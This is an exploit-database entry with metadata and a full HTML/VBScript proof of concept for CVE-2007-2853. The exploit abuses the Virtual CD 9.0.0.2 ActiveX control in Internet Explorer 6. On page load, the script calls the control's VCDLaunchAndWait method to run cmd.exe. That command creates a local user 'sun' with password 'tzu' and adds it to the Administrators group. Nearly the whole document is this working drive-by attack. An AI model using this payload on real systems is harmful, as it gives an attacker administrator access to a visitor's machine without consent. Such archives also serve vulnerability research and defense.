Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution
Author: rgod
type: remote
platform: windows
port:
date_added: 2007-05-20
date_updated:
verified: 1
codes: OSVDB-38099;CVE-2007-2853
tags:
aliases:
screenshot_url:
application_url:
<!--
IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit
by rgod
site: retrogod.altervista.org
software site: http://www.virtualcd-online.com/
-->
<html>
<object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C' id='VCDAPILibApi'></object>
<script language='vbscript'>
strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add "
strWorkDir="c:\windows\system32\"
showCmd=1
bWait=1
VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait
</script>
</html>
# milw0rm.com [2007-05-21]